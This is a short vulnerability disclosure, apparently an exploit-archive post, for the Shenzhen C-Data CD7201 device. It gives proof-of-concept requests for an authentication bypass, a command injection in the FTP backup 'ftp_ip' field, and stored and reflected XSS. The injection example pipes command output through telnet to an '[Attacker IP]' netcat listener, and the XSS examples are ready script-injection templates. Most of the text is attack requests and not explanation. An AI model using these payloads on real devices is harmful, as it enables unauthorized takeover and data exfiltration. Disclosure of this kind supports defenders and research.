Shenzhen C-Data CD7201 Command Injection / Cross Site Scripting
Posted on 11 July 2017
# Title: Shenzhen C-Data CD7201 / Multiple Vulnerabilities # Date: 10/09/2016 # Discovered by: @codexlynx # Vendor: Shenzhen C-Data # Vendor homepage: cdatatec.com # Model: CD7201 # Software Version: 2.4.6b # Firmware Version: 7.1.0 # Category: hardware, web, rce, xss [1]Authentication Bypass -------------------------------- Only the main HTML iframe is protected, you can access the others via the direct URL. - POC: Display links of the menu to bypass all the pages. http://[target]/cgi-bin/frame.php?page=frame_menu [2]Command Injection -------------------------------- "FTP Backup Recovery" is insecure, you can inject system commands. You can use "telnet" to the command output exfiltration. - POC 1: Basic injection: curl --data "ftp_port=21&ftp_user=admin&ftp_passwd=admin&file_name=test&ipaddr=127.0.0.1&call_function=backup&ftp_ip=`[Inject here]`" http://[target]/cgi-bin/system.php?page=system_management_save - POC 2: Injection and exfiltration: Shell 1: nc -vlp 9999 Shell 2: curl --data "ftp_port=21&ftp_user=admin&ftp_passwd=admin&file_name=test&ipaddr=127.0.0.1&call_function=backup&ftp_ip=`[Inject here]|telnet [Attacker IP] 9999`" http://[target]/cgi-bin/system.php?page=system_management_save [3]Stored Cross-Site-Scripting -------------------------------- Many metadata fields don't sanitize inputs. - POC: Persistent XSS in the "Location" field (http://[target]/cgi-bin/system.php?page=hardware_information). Location" style="width:90%"><script>[Javascript Here]</script><span class=" [4]Cross-Site-Scripting -------------------------------- Many GET parameters don't sanitize inputs. - POC: XSS in the "slave_mac" parameter. http://[target]/cgi-bin/slaves.php?page=slave_detail_top&slave_mac="/><script>[Javascript Here]</script>
